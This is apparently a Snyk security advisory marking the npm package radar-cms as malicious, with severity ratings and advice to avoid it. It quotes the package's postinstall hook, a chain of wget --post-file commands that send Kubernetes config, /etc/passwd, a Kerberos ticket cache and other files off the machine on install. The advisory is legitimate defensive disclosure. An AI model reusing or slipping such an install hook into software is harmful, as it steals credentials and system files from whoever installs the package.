Malicious Package Affecting radar-cms package, versions *



    Exploit Maturity Mature
    Attack Complexity Low
    User Interaction Required
    Scope Changed
    Confidentiality High
    Integrity High
    Availability High

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • Snyk ID SNYK-JS-RADARCMS-1082856
  • published 4 Mar 2021
  • disclosed 4 Mar 2021
  • credit Snyk Security Research

Introduced: 4 Mar 2021

Malicious CVE NOT AVAILABLE CWE-506 Open this link in a new tab
First added by Snyk

How to fix?

Avoid using radar-cms altogether.


radar-cms is a malicious package. The package was found to have a post-install command which when executed will exfiltrate multiple files from a host machine.


"postinstall": "wget --post-file ~/.kube/config;wget 
--post-file package.json;wget --post-file /etc/passwd;wget --post-file /tmp/krb5cc_0;wget --post-file /etc/hosts"